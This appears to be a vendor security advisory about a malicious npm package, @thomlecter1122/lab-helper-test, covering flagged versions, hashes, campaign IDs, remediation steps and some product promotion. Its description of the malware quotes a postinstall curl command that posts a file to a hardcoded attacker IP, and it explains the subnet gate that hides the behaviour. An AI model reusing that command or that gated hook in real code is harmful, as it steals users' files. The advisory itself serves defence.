Which versions of @thomlecter1122/lab-helper-test are malicious?

The following npm versions of @thomlecter1122/lab-helper-test are flagged malicious: 0.0.2, 0.0.3, 0.0.5, 0.0.11, 0.0.15, 0.0.16. Treat any of these as compromised.

How do I remediate @thomlecter1122/lab-helper-test if I installed it?

@thomlecter1122/lab-helper-test is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

I already installed @thomlecter1122/lab-helper-test — how do I know if it already compromised me?

If @thomlecter1122/lab-helper-test was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is @thomlecter1122/lab-helper-test part of a known attack campaign?

Yes — @thomlecter1122/lab-helper-test is associated with the IN-MAL-2026-005322, IN-MAL-2026-005324, IN-MAL-2026-005325, IN-MAL-2026-005323, IN-MAL-2026-005326, IN-MAL-2026-005827 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find @thomlecter1122/lab-helper-test across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @thomlecter1122/lab-helper-test (6 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @thomlecter1122/lab-helper-test across your stack and pipelines.

Malicious package

@thomlecter1122/lab-helper-testnpm

Malicious code in @thomlecter1122/lab-helper-test (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5534

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @thomlecter1122/lab-helper-test

What this malware does

The package ships a postinstall lifecycle script (sec_check.js) that fires automatically on npm install. The script first checks whether the host has a non-internal IPv4 address beginning with 192. (a network-environment gate that hides the behavior from developer laptops and CI on other subnets), and if so executes curl -X POST http://18.175.63.47:8080/collect --data-binary "@${INIT_CWD}/myfile.txt" via child_process.execSync with stdio suppressed. This reads a file from the installer's working directory and ships it over plain HTTP to a hardcoded bare-IP attacker host with no consent and no error surfacing. The combination of automatic lifecycle execution, environment-gated activation, hardcoded bare-IP C2, and silent error handling is a textbook exfiltration dropper.

Malicious versions

6 flagged

0.0.20.0.30.0.50.0.110.0.150.0.16

Indicators of compromise (SHA-256)

650b9b18b0bc5101d5d948edf6bb841af88e20509a061dbbfe3fa21a8658b819

9448c8cb290ff20cf707537035a6c383a4506b452c3ddc0e4c56bc398e02dbc7

c15cab8e8dc86301754623991e2ae38130feb1a7b5d26e7a204ac2fbd918a166

cef9ef58b6705aee11294b49f3e944e60b4047973a98378abc2f37e3dacd627b

e12350df6e9a9d5a75f3796a6ebe9c08156ada9cbfd29acd480bf78fa51e61b9

75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a

Detection & response playbook

Credential / info stealer

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @thomlecter1122/lab-helper-test (6 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @thomlecter1122/lab-helper-test across your stack and pipelines.
If you installed it — respond
@thomlecter1122/lab-helper-test is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If @thomlecter1122/lab-helper-test was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks @thomlecter1122/lab-helper-test before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. @thomlecter1122/lab-helper-test on npm has been identified as a malicious package (versions 0.0.2, 0.0.3, 0.0.5, 0.0.11, 0.0.15, 0.0.16 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005322IN-MAL-2026-005324IN-MAL-2026-005325IN-MAL-2026-005323IN-MAL-2026-005326IN-MAL-2026-005827

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks @thomlecter1122/lab-helper-test-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Malware detection Runtime egress monitoring